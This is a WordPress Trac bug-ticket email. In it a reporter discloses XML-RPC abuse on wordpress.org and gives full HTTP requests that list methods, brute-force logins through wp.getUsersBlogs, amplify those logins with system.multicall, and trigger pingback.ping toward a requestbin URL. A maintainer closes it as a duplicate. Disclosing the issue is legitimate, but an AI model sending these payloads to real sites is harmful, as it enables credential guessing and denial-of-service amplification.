[wp-trac] [WordPress Trac] #47856: I found that productivity should be turned off from the beginning or minimized possible harmful functions but it still exists in wordpress.org/xmlrpc.php like Multi brute force and DDoS attack. If you check the data correctly, you will see its search hazard.
WordPress Trac
noreply at wordpress.org
Fri Aug 9 13:50:51 UTC 2019
#47856: I found that productivity should be turned off from the beginning or
minimized possible harmful functions but it still exists in
wordpress.org/xmlrpc.php like Multi brute force and DDoS attack. If you
check the data correctly, you will see its search hazard.
--------------------------+------------------------
Reporter: victim01 | Owner: (none)
Type: defect (bug) | Status: closed
Priority: normal | Milestone:
Component: XML-RPC | Version:
Severity: normal | Resolution: duplicate
Keywords: | Focuses: rest-api
--------------------------+------------------------
Changes (by SergeyBiryukov):
* status: assigned => closed
* resolution: => duplicate
* component: General => XML-RPC
* milestone: Awaiting Review =>
Old description:
> ## I found that productivity should be turned off from the beginning or
> minimized possible harmful functions but it still exists in
> wordpress.org/xmlrpc.php like Multi brute force and DDoS attack. If you
> check the data correctly, you will see its search hazard.
> 1.First with the payload I list the available methods and can be
> exploited like:
> -wp.getUserBlogs
> -wp.getC loại
> -metaWeblog.getUsersBlogs
> -system.multicall
> -pingback.ping
>
> POST /xmlrpc.php HTTP/1.1
> Host: wordpress.org
> User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:68.0)
> Gecko/20100101 Firefox/68.0
> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
> Accept-Language: en-US,en;q=0.5
> Accept-Encoding: gzip, deflate
> Connection: close
> Upgrade-Insecure-Requests: 1
> Content-Length: 141
>
> <?xml version="1.0" encoding="UTF-8"?>
> <methodCall>
> <methodName> system.listMethods </methodName>
> <params> </params>
> </methodCall>
> ## Bruceforce attack
> The first place I can exploit is brute force login!
> POST /xmlrpc.php HTTP/1.1
> Host: wordpress.org
> User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:68.0)
> Gecko/20100101 Firefox/68.0
> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
> Accept-Language: en-US,en;q=0.5
> Accept-Encoding: gzip, deflate
> Connection: close
> Upgrade-Insecure-Requests: 1
> Content-Length: 208
>
> <?xml version="1.0" encoding="UTF-8"?>
> <methodCall>
> <methodName>wp.getUsersBlogs</methodName>
> <params>
> <param><value>admin</value></param>
> <param><value>pass</value></param>
> </params>
> </methodCall>
>
> 3. Now I can easily log in with different methods by available methods,
> and I can write a code to attack it with the existing user and password.
> That will take a lot of time but will have results. It can happen faster
> when you read my third item !!!
>
> ##DdoS attack
> Method pingback.ping
>
> The intend of Pingback is to notify a site that you link to about the
> link hoping that the site you are linking to will return the favor. Some
> systems automate this and maintain automated lists linking back to sites
> that covered their article. In order to implement pingback, WordPress
> implements an XML-RPC API function. This function will then send a
> request to the site to which you would like to send a "pingback".
> However, an attacker can take advantage of it to walk around DDos attacks
> that affect the service.
> POST /xmlrpc.php HTTP/1.1
> Host: wordpress.org
> User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:68.0)
> Gecko/20100101 Firefox/68.0
> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
> Accept-Language: en-US,en;q=0.5
> Accept-Encoding: gzip, deflate
> Connection: close
> Upgrade-Insecure-Requests: 1
> Content-Length: 249
>
> <methodCall>
> <methodName>pingback.ping</methodName>
> <params><param>
> <value><string>http://requestbin.net/r/1ak1hs11</string></value>
> </param><param><value><string>https://wordpress.org/news/</string>
> </value></param></params>
> </methodCall>
>
> ##Multicall
> This increases the attack capability of methods, for example when
> attacking bruteforce
> The vulnerability can easily be abused by a simple script to try a
> significant number of username and password combinations with a
> relatively small number of HTTP requests. The following diagram shows a
> 4-fold increase in login attempts to HTTP requests, but this can
> trivially be expanded to a thousand logins.
>
> POST /xmlrpc.php HTTP/1.1
> Host: wordpress.org
> User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:68.0)
> Gecko/20100101 Firefox/68.0
> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
> Accept-Language: en-US,en;q=0.5
> Accept-Encoding: gzip, deflate
> Connection: close
> Upgrade-Insecure-Requests: 1
> Content-Length: 929
>
> <?xml version="1.0"?>
> <methodCall>
> <methodName>system.multicall</methodName>
> <params>
> <param><value><array><data>
> <value><struct>
> <member>
> <name>methodName</name>
> <value><string>wp.getUsersBlogs</string></value>
> </member>
> <member>
> <name>params</name><value><array><data>
> <value><array><data>
> <value><string>admin</string></value>
> <value><string>password</string></value>
> </data></array></value>
> </data></array></value>
> </member>
> </struct></value>
> <value><struct>
> <member>
> <name>methodName</name>
> <value><string>wp.getUsersBlogs</string></value>
> </member>
> <member>
> <name>params</name>
> <value><array><data>
> <value><array><data>
> <value><string>admin</string></value>
> <value><string>password</string></value>
> </data></array></value>
> </data></array></value>
> </member>
> </struct></value>
> </data></array></value>
> </param>
> </params>
> </methodCall>
>
> What about combining it with some other way? For pingback methods, for
> example. It increases time and danger !!
> During testing, I was able to call the method wp.getUserBlogs 1,000 times
> in a single HTTP request (limited only by PHP memory issues). If a user
> creates a simple shell loop that executes one thousand times and runs a
> PHP script that crafts an HTTP request with one thousand method calls all
> requiring authentication, then that user would be able to try one million
> unique logins in a very short period of time.
>
> This makes brute forcing the login very fast and can run down a pretty
> large wordlist in a short period of time. Also note that the
> wp.getUserBlogs method isn’t the only RPC call requiring authentication.
> It’s possible to use any RPC method which requires authentication to
> attempt logins and brute force the Wordpress credentials.
>
> Damage from the above holes is the damage to the remains that need to be
> patched. You can remove it if not needed. Or minimize the methods that
> can cause injury as the above methods !!!
> ##NOTE:
> +A nice stop gap to this as well, block all *.php requests in your WAF if
> you can.All of our legitimate requests for WP are relative links with the
> ".php" chopped off. By blocking *.php at WAF we are actually blocking
> 99.7% of all automated scanners and botnet traffic looking for WP sites.
> +Turn off some dangerous functions
>
> ##Document:
> https://medium.com/@the.bilal.rizwan/wordpress-xmlrpc-php-common-
> vulnerabilites-how-to-exploit-them-d8d3c8600b32
> https://blog.sucuri.net/2015/10/brute-force-amplification-attacks-
> against-wordpress-xmlrpc.html
> https://blog.cloudflare.com/a-look-at-the-new-wordpress-brute-force-
> amplification-attack/
>
> ------Thank for reading-------
New description:
## I found that productivity should be turned off from the beginning or
minimized possible harmful functions but it still exists in
wordpress.org/xmlrpc.php like Multi brute force and DDoS attack. If you
check the data correctly, you will see its search hazard.
1.First with the payload I list the available methods and can be exploited
like:
-wp.getUserBlogs
-wp.getC loại
-metaWeblog.getUsersBlogs
-system.multicall
-pingback.ping
{{{
POST /xmlrpc.php HTTP/1.1
Host: wordpress.org
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:68.0)
Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 141
<?xml version="1.0" encoding="UTF-8"?>
<methodCall>
<methodName> system.listMethods </methodName>
<params> </params>
</methodCall>
}}}
## Bruceforce attack
The first place I can exploit is brute force login!
{{{
POST /xmlrpc.php HTTP/1.1
Host: wordpress.org
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:68.0)
Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 208
<?xml version="1.0" encoding="UTF-8"?>
<methodCall>
<methodName>wp.getUsersBlogs</methodName>
<params>
<param><value>admin</value></param>
<param><value>pass</value></param>
</params>
</methodCall>
}}}
3. Now I can easily log in with different methods by available methods,
and I can write a code to attack it with the existing user and password.
That will take a lot of time but will have results. It can happen faster
when you read my third item !!!
##DdoS attack
Method pingback.ping
The intend of Pingback is to notify a site that you link to about the link
hoping that the site you are linking to will return the favor. Some
systems automate this and maintain automated lists linking back to sites
that covered their article. In order to implement pingback, WordPress
implements an XML-RPC API function. This function will then send a request
to the site to which you would like to send a "pingback".
However, an attacker can take advantage of it to walk around DDos attacks
that affect the service.
{{{
POST /xmlrpc.php HTTP/1.1
Host: wordpress.org
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:68.0)
Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 249
<methodCall>
<methodName>pingback.ping</methodName>
<params><param>
<value><string>http://requestbin.net/r/1ak1hs11</string></value>
</param><param><value><string>https://wordpress.org/news/</string>
</value></param></params>
</methodCall>
}}}
##Multicall
This increases the attack capability of methods, for example when
attacking bruteforce
The vulnerability can easily be abused by a simple script to try a
significant number of username and password combinations with a relatively
small number of HTTP requests. The following diagram shows a 4-fold
increase in login attempts to HTTP requests, but this can trivially be
expanded to a thousand logins.
{{{
POST /xmlrpc.php HTTP/1.1
Host: wordpress.org
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:68.0)
Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 929
<?xml version="1.0"?>
<methodCall>
<methodName>system.multicall</methodName>
<params>
<param><value><array><data>
<value><struct>
<member>
<name>methodName</name>
<value><string>wp.getUsersBlogs</string></value>
</member>
<member>
<name>params</name><value><array><data>
<value><array><data>
<value><string>admin</string></value>
<value><string>password</string></value>
</data></array></value>
</data></array></value>
</member>
</struct></value>
<value><struct>
<member>
<name>methodName</name>
<value><string>wp.getUsersBlogs</string></value>
</member>
<member>
<name>params</name>
<value><array><data>
<value><array><data>
<value><string>admin</string></value>
<value><string>password</string></value>
</data></array></value>
</data></array></value>
</member>
</struct></value>
</data></array></value>
</param>
</params>
</methodCall>
}}}
What about combining it with some other way? For pingback methods, for
example. It increases time and danger !!
During testing, I was able to call the method wp.getUserBlogs 1,000 times
in a single HTTP request (limited only by PHP memory issues). If a user
creates a simple shell loop that executes one thousand times and runs a
PHP script that crafts an HTTP request with one thousand method calls all
requiring authentication, then that user would be able to try one million
unique logins in a very short period of time.
This makes brute forcing the login very fast and can run down a pretty
large wordlist in a short period of time. Also note that the
wp.getUserBlogs method isn’t the only RPC call requiring authentication.
It’s possible to use any RPC method which requires authentication to
attempt logins and brute force the WordPress credentials.
Damage from the above holes is the damage to the remains that need to be
patched. You can remove it if not needed. Or minimize the methods that can
cause injury as the above methods !!!
##NOTE:
+A nice stop gap to this as well, block all *.php requests in your WAF if
you can.All of our legitimate requests for WP are relative links with the
".php" chopped off. By blocking *.php at WAF we are actually blocking
99.7% of all automated scanners and botnet traffic looking for WP sites.
+Turn off some dangerous functions
##Document:
https://medium.com/@the.bilal.rizwan/wordpress-xmlrpc-php-common-
vulnerabilites-how-to-exploit-them-d8d3c8600b32
https://blog.sucuri.net/2015/10/brute-force-amplification-attacks-against-
wordpress-xmlrpc.html
https://blog.cloudflare.com/a-look-at-the-new-wordpress-brute-force-
amplification-attack/
------Thank for reading-------
--
Comment:
Hi @victim01, welcome to WordPress Trac!
A DoS (Denial of Service) against `xmlrpc.php` is no different to one
against the homepage or `wp-login.php`, preventing it is out of scope for
WordPress. Caching and security plugins often attempt to cover this well,
but ultimately it's a issue that needs to be handled at the server level.
See #35532, #36806, #24193, and other similar tickets.
See also #34336 for some details on `system.multicall`.
Additionally, when writing this ticket you should have seen this notice:
> **Do not report potential security vulnerabilities here.**
> See the [https://make.wordpress.org/core/handbook/reporting-security-
vulnerabilities/ Security FAQ] and visit the
[https://hackerone.com/wordpress WordPress HackerOne program].
--
Ticket URL: <https://core.trac.wordpress.org/ticket/47856#comment:1>
WordPress Trac <https://core.trac.wordpress.org/>
WordPress publishing platform
More information about the wp-trac
mailing list